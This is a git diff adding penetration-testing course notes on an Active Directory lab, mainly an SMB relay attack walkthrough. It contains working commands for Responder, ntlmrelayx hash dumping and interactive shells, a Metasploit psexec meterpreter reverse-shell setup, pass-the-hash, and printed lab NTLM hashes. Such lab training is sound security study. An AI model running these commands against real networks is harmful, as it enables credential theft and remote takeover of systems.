SMB relay attack

peh/4-active-directory/1-ad-lab.md

@@ -82,3 +82,21 @@ setspn -T MARVEL.local -Q */*
 
 ---
 
+| VM                       | IP            |
+| ------------------------ | ------------- |
+| hydra-dc.MARVEL.local    | 192.168.31.90 |
+| spiderman.MARVEL.local   | 192.168.31.92 |
+| thepunisher.MARVEL.local | 192.168.31.93 |
+
+
+
+- Set `/etc/hosts` in the Kali VM
+
+```bash
+192.168.31.90  hydra-dc.MARVEL.local
+192.168.31.92  spiderman.MARVEL.local
+192.168.31.93  thepunisher.MARVEL.local
+```
+
+---
+

peh/4-active-directory/2-ad-init-vectors.md

@@ -54,3 +54,206 @@ hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt --show
 
 ---
 
+## [SMB Relay](https://tcm-sec.com/smb-relay-attacks-and-how-to-prevent-them/)
+
+➡️ **SMB** (Server Message Block) is a network file sharing protocol. Common in Windows, it allows shared access to files and printers. However, when unsecured and paired with **NTLM** authentication, it becomes a target to relay attacks.
+
+- Attackers intercept and relay SMB authentication attempts to another server, impersonating the user and exploiting SMB due to lack of SMB signing, gaining unauthorized access
+- Requirements:
+  - SMB signing disabled or not enforced
+  - Relayed user must have local admin credentials
+  - Credentials cannot be relayed to the same machine
+
+**Identify the hosts without SMB signing**.
+
+```bash
+nmap --script=smb2-security-mode.nse -p445 192.168.31.90-93 -Pn
+```
+
+```bash
+-------------------------------------------------------------
+Nmap scan report for hydra-dc.MARVEL.local (192.168.31.90)
+Host is up (0.00034s latency).
+
+PORT    STATE SERVICE
+445/tcp open  microsoft-ds
+
+Host script results:
+| smb2-security-mode: 
+|   3:1:1: 
+|_    Message signing enabled and required
+
+-------------------------------------------------------------
+Nmap scan report for spiderman.MARVEL.local (192.168.31.92)
+Host is up (0.00045s latency).
+
+PORT    STATE SERVICE
+445/tcp open  microsoft-ds
+
+Host script results:
+| smb2-security-mode: 
+|   3:1:1: 
+|_    Message signing enabled but not required
+
+-------------------------------------------------------------
+Nmap scan report for thepunisher.MARVEL.local (192.168.31.93)
+Host is up (0.00038s latency).
+
+PORT    STATE SERVICE
+445/tcp open  microsoft-ds
+
+Host script results:
+| smb2-security-mode: 
+|   3:1:1: 
+|_    Message signing enabled but not required
+```
+
+- SMB signing is not enforced (default setting for Windows workstations)
+
+```bash
+# Check on Windows - cmd
+reg query HKLM\System\CurrentControlSet\Services\LanManServer\Parameters | findstr /I securitysignature
+```
+
+![](.gitbook/assets/2024-07-29_17-36-56_666.png)
+
+- Create a `targets.txt` file with the gathered targets
+
+```bash
+echo -e "192.168.31.92\n192.168.31.93" > targets.txt
+```
+
+- Setup Responder configuration file
+
+```bash
+sudo nano /etc/responder/Responder.conf
+```
+
+```bash
+# Swtich Off SMB and HTTP
+SMB = Off
+...
+HTTP = Off
+...
+```
+
+```bash
+# Run Responder
+sudo responder -I eth0 -dPv
+```
+
+![](.gitbook/assets/2024-07-29_17-11-00_662.png)
+
+### ntlmrelayx.py
+
+➡️ [ntlmrelayx.py](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py) - This module performs the SMB Relay attacks to many target protocols (SMB, MSSQL, LDAP, etc).
+
+- Setup the NTLM relay
+- (`ntlmrelayx.py` is older version installed via [PimpMyKali](https://github.com/Dewalt-arch/pimpmykali/blob/master/pimpmykali.sh))
+
+```bash
+sudo ntlmrelayx.py -tf targets.txt -smb2support
+```
+
+- Login to `THEPUNISHER` VM with `fcastle` user and try to open WinExplorer and navigate to `\\192.168.31.131` (Kali IP)
+- An event occurs and triggers LLMNR, is captured by responder, passed to `ntlmrelayx` with relays the credentials to the targets in our `targets.txt` file
+
+![](.gitbook/assets/2024-07-29_17-19-49_663.png)
+
+- The local SAM hashes are dumped from `SPIDERMAN` and save automatically into the `192.168.31.92_samhashes.sam` file
+
+```bash
+# SPIDERMAN - 192.168.31.92 SAM Hashes
+
+Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:60d1d3dc4291fca471e146c798f8d603:::
+peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
+```
+
+- Try to start an interactive shell via `ntlmrelayx.py`
+
+```bash
+sudo ntlmrelayx.py -tf targets.txt -smb2support -i
+# trigger the event in the Windows VM
+
+[...]
+[*] Authenticating against smb://192.168.31.92 as MARVEL\fcastle SUCCEED
+[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
+```
+
+```bash
+# Bind to the the SMB shell
+nc 127.0.0.1 11000
+```
+
+![](.gitbook/assets/2024-07-29_17-25-15_664.png)
+
+```bash
+# Execute commands
+
+sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
+
+# trigger the event in the Windows VM
+```
+
+![](.gitbook/assets/2024-07-29_17-30-47_665.png)
+
+### msfconsole - shell access
+
+```bash
+msfconsole
+```
+
+```bash
+search psexec
+use exploit/windows/smb/psexec
+
+set payload windows/x64/meterpreter/reverse_tcp
+set rhosts 192.168.31.93
+set smbdomain MARVEL.local
+set smbuser fcastle
+set smbpass Password1
+show targets # proceed with Automatic
+
+run
+```
+
+![](.gitbook/assets/2024-07-29_17-56-07_667.png)
+
+```bash
+background
+sessions
+session 1
+```
+
+```bash
+# Do the hash attack
+
+# Set SMB user to a local user
+set smbuser administrator
+unset smbdomain
+set smbpass aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
+run
+```
+
+![](.gitbook/assets/2024-07-29_17-59-35_668.png)
+
+### psexec.py - shell access
+
+➡️ [psexec.py](https://github.com/fortra/impacket/blob/master/examples/psexec.py)
+
+```bash
+# Login with password
+psexec.py MARVEL.local/fcastle:'Password1'@192.168.31.93
+psexec.py MARVEL.local/fcastle:@192.168.31.93
+
+# Login with hash
+psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
+```
+
+![](.gitbook/assets/2024-07-29_18-03-18_669.png)
+
+---
+

peh/peh-references.md

@@ -152,7 +152,11 @@
 - [PimpmyADLab](https://github.com/Dewalt-arch/pimpmyadlab)
 - [Building a Windows AD lab](https://ad-lab.gitbook.io/building-a-windows-ad-lab/)
 - [GrouppVM](https://github.com/vulfilip/grouppvm)
+- [How To Setup Red Team And Blue Team Lab 2024 - Part 2 - InfoSec Pat](https://www.youtube.com/watch?v=uGvb8zE219Y)
 - [LLMNR Poisoning and How to Prevent It - TCM Security](https://tcm-sec.com/llmnr-poisoning-and-how-to-prevent-it/)
+  - [LLMNR | Pentest Everything - viperone.gitbook.io](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/adversary-in-the-middle/llmnr)
+
+- [SMB Relay Attacks and How to Prevent Them - TCM Security](https://tcm-sec.com/smb-relay-attacks-and-how-to-prevent-them/)
 
 ## Post Exploitation